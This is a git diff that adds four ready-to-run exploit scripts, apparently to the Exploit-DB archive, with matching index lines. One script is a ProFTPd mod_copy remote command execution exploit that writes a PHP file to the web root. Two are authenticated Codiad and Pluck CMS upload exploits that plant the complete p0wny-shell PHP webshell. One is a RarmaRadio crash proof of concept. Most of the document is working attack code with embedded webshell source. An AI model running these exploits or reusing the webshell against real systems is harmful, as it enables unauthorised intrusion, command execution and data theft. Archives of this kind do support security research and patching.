diff --git a/exploits/linux/remote/49908.py b/exploits/linux/remote/49908.py
new file mode 100755
index 000000000..729a313f6
--- /dev/null
+++ b/exploits/linux/remote/49908.py
@@ -0,0 +1,46 @@
+# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
+# Date: 25/05/2021
+# Exploit Author: Shellbr3ak
+# Version: 1.3.5
+# Tested on: Ubuntu 16.04.6 LTS
+# CVE : CVE-2015-3306
+
+#!/usr/bin/env python3
+
+import sys
+import socket
+import requests
+
+def exploit(client, target):
+ client.connect((target,21)) # Connecting to the target server
+ banner = client.recv(74)
+ print(banner.decode())
+ client.send(b'site cpfr /etc/passwd\r\n')
+ print(client.recv(1024).decode())
+ client.send(b'site cpto \r\n') # phpinfo() is just a PoC.
+ print(client.recv(1024).decode())
+ client.send(b'site cpfr /proc/self/fd/3\r\n')
+ print(client.recv(1024).decode())
+ client.send(b'site cpto /var/www/html/test.php\r\n')
+ print(client.recv(1024).decode())
+ client.close()
+ print('Exploit Completed')
+
+def check(url):
+ req = requests.get(url) # Requesting the written PoC php file via HTTP
+ if req.status_code == 200:
+ print('[+] File Written Successfully')
+ print(f'[+] Go to : {url}')
+ else:
+ print('[!] Something Went Wrong')
+ print('[!] Directory might not be writable')
+
+def main():
+ client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ target = sys.argv[1]
+ exploit(client, target)
+ url = 'http://' + target + '/test.php'
+ check(url)
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49907.py b/exploits/multiple/webapps/49907.py
new file mode 100755
index 000000000..5bd07153a
--- /dev/null
+++ b/exploits/multiple/webapps/49907.py
@@ -0,0 +1,135 @@
+# Exploit Title: Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)
+# Date: 24.05.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: http://codiad.com/
+# Software Link: https://github.com/Codiad/Codiad/releases/tag/v.2.8.4
+# Version: 2.8.4
+# Tested on Xubuntu 20.04
+# CVE: CVE-2018-19423
+
+'''
+Description:
+Codiad 2.8.4 allows remote authenticated administrators to execute arbitrary code by uploading an executable file.
+'''
+
+
+'''
+Import required modules:
+'''
+import requests
+import json
+import time
+import sys
+import urllib.parse
+
+'''
+User Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+username = sys.argv[3]
+password = sys.argv[4]
+codiadpath = input('Please input the path of Codiad( for example: / ): ')
+projectname = input('Please input the name of the actual project: ')
+
+
+
+'''
+Get cookie
+'''
+session = requests.Session()
+link = 'http://' + target_ip + ':' + target_port + codiadpath
+response = session.get(link)
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+
+
+'''
+Authentication:
+'''
+# Compute Content-Length:
+base_content_len = 45
+username_encoded = urllib.parse.quote(username, safe='')
+username_encoded_len = len(username_encoded.encode('utf-8'))
+password_encoded = urllib.parse.quote(password, safe='')
+password_encoded_len = len(password_encoded.encode('utf-8'))
+content_len = base_content_len + username_encoded_len + password_encoded_len
+
+# Header:
+header = {
+ 'Host': target_ip,
+ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+ 'Accept': '*/*',
+ 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+ 'X-Requested-With': 'XMLHttpRequest',
+ 'Content-Length': str(content_len),
+ 'Origin': 'http://' + target_ip + ':' + target_port,
+ 'Connection': 'close',
+ 'Referer': 'http://' + target_ip + ':' + target_port + '/',
+ 'Cookie': cookie
+}
+
+# Body:
+body = {
+ 'username': username,
+ 'password': password,
+ 'theme': 'default',
+ 'language': 'en'
+}
+
+# Post authentication request:
+link_base = 'http://' + target_ip + ':' + target_port + codiadpath
+link_auth = link_base + 'components/user/controller.php?action=authenticate'
+print('')
+print('Posting authentication request: ')
+auth = requests.post(link_auth, headers=header, data=body)
+print('Response: ')
+print(auth.text)
+time.sleep(2)
+
+
+'''
+Upload Webshell:
+'''
+# Construct Header:
+header = {
+ 'Host': target_ip,
+ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+ 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+ 'Accept-Encoding': 'gzip, deflate',
+ "Content-Type": "multipart/form-data; boundary=---------------------------289777152427948045812862014674",
+ 'Connection': 'close',
+ 'Cookie': cookie,
+ 'Upgrade-Insecure-Requests': '1'
+}
+
+# Construct Shell Payload: https://github.com/flozz/p0wny-shell
+data = "\r\n\r\n\r\n-----------------------------289777152427948045812862014674\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n
\n \n p0wny@shell:~#\n \n \n\n \n \n\n \n \n
\n \n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n
\n \n\n\n\r\n-----------------------------289777152427948045812862014674--\r\n"
+
+#Construct link and posting request which will upload the file:
+link_exploit = link_base + 'components/filemanager/controller.php?action=upload&path=/var/www/html/data/' + projectname
+print('')
+print('Posting request wich will upload the file: ')
+exploit = requests.post(link_exploit, headers=header, data=data)
+print('Response:')
+print(exploit.text)
+time.sleep(2)
+
+
+'''
+Finish:
+'''
+print('')
+print('File uploaded except you got an error message before. If so please run this program again and correct your',
+ 'mistakes!')
+print('')
+print('Path of file on the server: http://' + target_ip + ':' + target_port + codiadpath + '/data/' + projectname + '/' + 'shell.php')
+print('')
\ No newline at end of file
diff --git a/exploits/php/webapps/49909.py b/exploits/php/webapps/49909.py
new file mode 100755
index 000000000..6f852e96b
--- /dev/null
+++ b/exploits/php/webapps/49909.py
@@ -0,0 +1,125 @@
+# Exploit Title: Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)
+# Date: 25.05.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://github.com/pluck-cms/pluck
+# Software Link: https://github.com/pluck-cms/pluck/releases/tag/4.7.13
+# Version: 4.7.13
+# Tested on Xubuntu 20.04
+# CVE: CVE-2020-29607
+
+'''
+Description:
+A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin
+privileged user to gain access in the host through the "manage files" functionality,
+which may result in remote code execution.
+'''
+
+
+'''
+Import required modules:
+'''
+import sys
+import requests
+import json
+import time
+import urllib.parse
+
+
+'''
+User Input:
+'''
+target_ip = sys.argv[1]
+target_port = sys.argv[2]
+password = sys.argv[3]
+pluckcmspath = sys.argv[4]
+
+
+'''
+Get cookie
+'''
+session = requests.Session()
+link = 'http://' + target_ip + ':' + target_port + pluckcmspath
+response = session.get(link)
+cookies_session = session.cookies.get_dict()
+cookie = json.dumps(cookies_session)
+cookie = cookie.replace('"}','')
+cookie = cookie.replace('{"', '')
+cookie = cookie.replace('"', '')
+cookie = cookie.replace(" ", '')
+cookie = cookie.replace(":", '=')
+
+
+'''
+Authentication:
+'''
+# Compute Content-Length:
+base_content_len = 27
+password_encoded = urllib.parse.quote(password, safe='')
+password_encoded_len = len(password_encoded.encode('utf-8'))
+content_len = base_content_len + password_encoded_len
+
+# Construct Header:
+header = {
+ 'Host': target_ip,
+ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+ 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Content-Length': str(content_len),
+ 'Origin': 'http://' + target_ip,
+ 'Connection': 'close',
+ 'Referer': 'http://' + target_ip + pluckcmspath + '/login.php',
+ 'Cookie': cookie,
+ 'Upgrade-Insecure-Requests': '1'
+}
+
+# Construct Data:
+body = {
+ 'cont1': password,
+ 'bogus': '',
+ 'submit': 'Log in',
+}
+
+# Authenticating:
+link_auth = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/login.php'
+auth = requests.post(link_auth, headers=header, data=body)
+print('')
+if 'error' in auth.text:
+ print('Password incorrect, please try again:')
+ exit()
+else:
+ print('Authentification was succesfull, uploading webshell')
+ print('')
+
+
+'''
+Upload Webshell:
+'''
+# Construct Header:
+header = {
+ 'Host': target_ip,
+ 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+ 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'multipart/form-data; boundary=---------------------------5170699732428994785525662060',
+ 'Connection': 'close',
+ 'Referer': 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=files',
+ 'Cookie': cookie,
+ 'Upgrade-Insecure-Requests': '1'
+}
+
+# Constructing Webshell payload: I'm using p0wny-shell: https://github.com/flozz/p0wny-shell
+data = "-----------------------------5170699732428994785525662060\r\nContent-Disposition: form-data; name=\"filefile\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n \n
\n \n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n
\n \n\n\n\r\n-----------------------------5170699732428994785525662060\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload\r\n-----------------------------5170699732428994785525662060--\r\n"
+
+# Uploading Webshell:
+link_upload = 'http://' + target_ip + ':' + target_port + pluckcmspath + '/admin.php?action=files'
+upload = requests.post(link_upload, headers=header, data=data)
+
+
+'''
+Finish:
+'''
+print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + pluckcmspath + '/files/shell.phar')
+print('')
\ No newline at end of file
diff --git a/exploits/windows/dos/49906.py b/exploits/windows/dos/49906.py
new file mode 100755
index 000000000..c56a4d0c9
--- /dev/null
+++ b/exploits/windows/dos/49906.py
@@ -0,0 +1,29 @@
+# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
+# Date: 2021-05-25
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.raimersoft.com/
+# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
+# Version: 2.75.8
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program RarmaRadio
+# Click in Edit and select Settings
+# Click in Network option
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Lambda.txt"
+# Paste the content in the fields Username, Server, Port and User Agent
+# Click in OK
+# End :)
+
+
+buffer = 'Ñ' * 100000
+
+try:
+ file = open("Lambda.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 56b9d2b7e..d2efa3b60 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6783,6 +6783,7 @@ id,file,description,date,author,type,platform,port
49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows,
49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios,
49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
+49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18470,6 +18471,7 @@ id,file,description,date,author,type,platform,port
49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware,
49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux,
49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris,
+49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -44069,3 +44071,5 @@ id,file,description,date,author,type,platform,port
49903,exploits/php/webapps/49903.txt,"WordPress Plugin ReDi Restaurant Reservation 21.0307 - 'Comment' Stored Cross-Site Scripting (XSS)",2021-05-24,"Bastijn Ouwendijk",webapps,php,
49904,exploits/php/webapps/49904.txt,"Gadget Works Online Ordering System 1.0 - 'Category' Persistent Cross-Site Scripting (XSS)",2021-05-25,"Vinay H C",webapps,php,
49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php,
+49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
+49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,